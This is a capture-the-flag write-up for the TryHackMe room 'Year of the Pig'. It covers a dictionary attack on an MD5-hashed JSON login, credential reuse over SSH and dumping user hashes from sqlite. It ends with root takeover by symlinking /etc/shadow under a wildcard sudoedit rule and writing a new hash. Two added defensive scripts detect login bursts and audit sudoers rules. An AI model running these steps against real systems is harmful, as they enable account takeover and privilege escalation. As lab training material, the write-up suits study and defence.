WriteUp — THM Year of the Pig
Some pigs fly, and some have stories to tell. Get going!
This is a writeup for TryHackMe room Year of the Pig.
Reconnaissance
Let’s start by doing an nmap scan to see which ports are open:
nmap -sC -sV -p- 10.10.15.32
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-02 19:28 EET
Nmap scan report for 10.10.15.32
Host is up (0.057s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Marco's Blog
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Ok, a pretty clear signal to start by enumerating the web server. It’s a simple site so let’s dig deeper.
Enumerating the server directories reveals an admin page at /login.php:
Gaining access
The page is pretty interesting. There is cryptic JavaScript that sends a JSON payload in a POST request to http://10.10.15.32/api/login in the format:
{"username":"admin","password":"3858f62230ac3c915f300c664312c63f"}
The password value is the MD5 hash of the password string. After a failed login we get a password hint:
Remember that passwords should be a memorable word, followed by two numbers and a special character.
This should be enough to craft a dictionary attack. I don’t think hydra supports this kind of authentication, so maybe a custom Python script might be good? I could generate passwords with John and feed them to my script. I make a simple rule and add it to /etc/john/john.conf:
[List.Rules:PigRule]
Az"[0-9][0-9][!?#$%&/()=]"
I harvest the website for “memorable words”:
Marco
marco
plane
planes
airplane
airplanes
airforce
flying
Savoia
savoia
Macchi
macchi
Curtiss
curtiss
milan
Milan
mechanic
maintenance
Italian
italian
Agility
agility
I then make a Python script to test out the passwords:
And generate passwords based on my rule and try them out:
john --wordlist=words -rules:PigRule -stdout | python3 auth.py http://10.10.15.32 marco
After quite a while I finally get the password __REDACTED__ and can log in to the website. I could have narrowed the wordlist down further. There is a page to enter commands to the system, but a lot of what I tried didn’t work. whoami works and reveals the website is running as www-data. So I tried to log in with SSH using the same credentials, got in, and found the first flag!
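As an added defender’s-side example (not part of the original writeup), here is detection logic for the kind of dictionary attack described above: it parses Apache combined-format access log lines and flags any client that POSTs to /api/login at least a threshold number of times inside a sliding window. The log lines and the client IPs 10.9.0.5 and 10.9.0.7 are constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache combined log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Return the fields of one access-log line, or None if it doesn't parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "ts": datetime.strptime(m["ts"], TS_FMT),
            "method": m["method"], "path": m["path"], "status": int(m["status"])}

def login_bursts(lines, path="/api/login", threshold=10, window_s=60):
    """Map each client IP to the highest number of POSTs to `path` it made
    inside any `window_s`-second window, keeping only IPs at or above
    `threshold`. Status codes are deliberately ignored: a JSON login API
    like this one can answer 200 for a rejected password, so the request
    rate is the signal, not the response."""
    recent = defaultdict(deque)  # ip -> timestamps of its recent login POSTs
    peaks = {}
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] != "POST" or rec["path"] != path:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (q[-1] - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold:
            peaks[rec["ip"]] = max(peaks.get(rec["ip"], 0), len(q))
    return peaks

# Constructed sample: one client fires 15 login POSTs in 30 seconds
# (a wordlist-fed script), another client logs in once.
SAMPLE_LOG = [
    f'10.9.0.5 - - [02/Nov/2020:19:40:{s:02d} +0200] "POST /api/login HTTP/1.1" '
    f'200 38 "-" "python-requests/2.24.0"' for s in range(0, 30, 2)
] + ['10.9.0.7 - - [02/Nov/2020:19:40:10 +0200] "POST /api/login HTTP/1.1" '
     '200 38 "-" "Mozilla/5.0"']

if __name__ == "__main__":
    for ip, n in login_bursts(SAMPLE_LOG).items():
        print(f"possible dictionary attack from {ip}: {n} POSTs to /api/login within 60s")
```

Run it against a real access.log by replacing SAMPLE_LOG with the file’s lines; the threshold should be tuned to the site’s normal login rate.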
Privilege escalation
First I check sudo since I know the password, but there are no sudo rights. I do a quick enumeration of the home directories and there is a flag2.txt in /home/curtis, but I cannot read it. Maybe I first need to escalate to curtis and then escalate further as him. This hints at sudo rights for him, so I check them out:
cat /etc/sudoers.d/curtis
curtis ALL=(ALL:ALL) sudoedit /var/www/html/*/*/config.php
Now I need to figure out how to log in as curtis. I check the portal and there is an option to reset his password:
I do it and try to log in with su, but it doesn’t work. Neither does SSH.
I do a linPEAS enumeration but don’t find any PE vectors. So it’s time to look at the website.
I enumerate /var/www and notice that the web app uses a REST API which stores data in a sqlite3 database:
marco@year-of-the-pig:/var/www$ ls -la
total 36
drwxr-xr-x 3 www-data web-developers 4096 Nov 2 19:22 .
drwxr-xr-x 13 root root 4096 Aug 22 00:02 ..
-rw------- 1 www-data www-data 24576 Nov 2 19:22 admin.db
drwxrwxr-x 7 www-data web-developers 4096 Aug 21 23:57 html
Maybe I could get this file somehow using the commands from the website, since it’s running as www-data. But since I reset the password for curtis I have to reset the box before proceeding. Luckily the password for marco wasn’t dynamically generated, so I didn’t have to attack it again!
I have to take a closer look at how commands are executed since most of them didn’t work. Let’s take a look at commands.php:
Ok, LOL. No wonder most commands didn’t work. But since I can write to the file let’s add another command:
Now we can dump the users:
marco@year-of-the-pig:/var/www$ sqlite3 admin.db
SQLite version 3.22.0 2018-01-22 18:45:57
Enter ".help" for usage hints.
sqlite> select * from users;
58a2f366b1fd51e127a47da03afc9995|marco|ea22b622ba9b3c41b22785dcb40211ac
f64ccfff6f64d57b121a85f9385cf256|curtis|a80bfe309eca.....1ea6cb3677971f2
Use crackstation.net to crack the hash: __REDACTED__. Try to log in with SSH. Doesn’t work. But su - curtis does.
Let’s now look at that sudo again. We can edit some files. Quick googling reveals an exploit: https://www.exploit-db.com/exploits/37710
I tweak my awesome command to also chmod /var/www so that everyone has all rights to it, and to create /foo/bar directories under it. Then I link /etc/shadow to be config.php:
ln -s /etc/shadow config.php
Then I can edit the file with the sudo command. Initially I thought to crack the hash with John, but why not just change the password?
openssl passwd -6 -salt xyz hackerftw
$6$xyz$O5zokcxlIfqJROMbd7RNFPqU8xGaJQhEHueCQ8NdrTQOtNDuB9OjzgLk6L2GiXdpeqxea3cy/F9RAZoW3OW4G0
sudoedit the linked file and BOOM!
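As an added defender’s-side check (not part of the original writeup), this script audits sudoers rules for the pattern abused above: a sudoedit entry whose target path contains a wildcard. It reports such rules so they can be replaced with exact paths. The sudoers text is constructed for the example; the curtis line is the one shown earlier, the others are made up for contrast.

```python
import re
import sys

# Matches a user specification line: user host=(runas) [tags:] commands
RULE_RE = re.compile(
    r'^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$'
)
GLOB_CHARS = set('*?[')

def risky_sudoedit_rules(text):
    """Return (user, path) pairs for every sudoedit command whose target
    path contains a glob. A wildcard lets the invoking user choose which
    directory gets matched, so unless every such directory is root-owned
    and not writable by that user the rule is unsafe; an exact path has
    no such ambiguity."""
    findings = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()       # strip comments
        if not line or line.startswith('Defaults'):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in m['cmds'].split(','):
            toks = [t for t in cmd.split() if not t.endswith(':')]  # drop NOPASSWD: etc.
            if toks and toks[0] == 'sudoedit':
                findings += [(m['user'], p) for p in toks[1:] if GLOB_CHARS & set(p)]
    return findings

# Constructed sudoers content: the curtis rule from the room next to an
# exact-path sudoedit rule and an ordinary command rule for contrast.
SAMPLE_SUDOERS = """\
Defaults env_reset
curtis ALL=(ALL:ALL) sudoedit /var/www/html/*/*/config.php
deploy ALL=(root) NOPASSWD: sudoedit /etc/app/app.conf   # exact path, fine
ops ALL=(ALL) /usr/bin/systemctl restart apache2
"""

if __name__ == "__main__":
    # Audit real files when given paths (e.g. /etc/sudoers /etc/sudoers.d/*),
    # otherwise run against the constructed sample.
    sources = sys.argv[1:] or [None]
    for src in sources:
        text = open(src).read() if src else SAMPLE_SUDOERS
        for user, path in risky_sudoedit_rules(text):
            print(f"{src or 'sample'}: {user} may sudoedit wildcard path {path}")
```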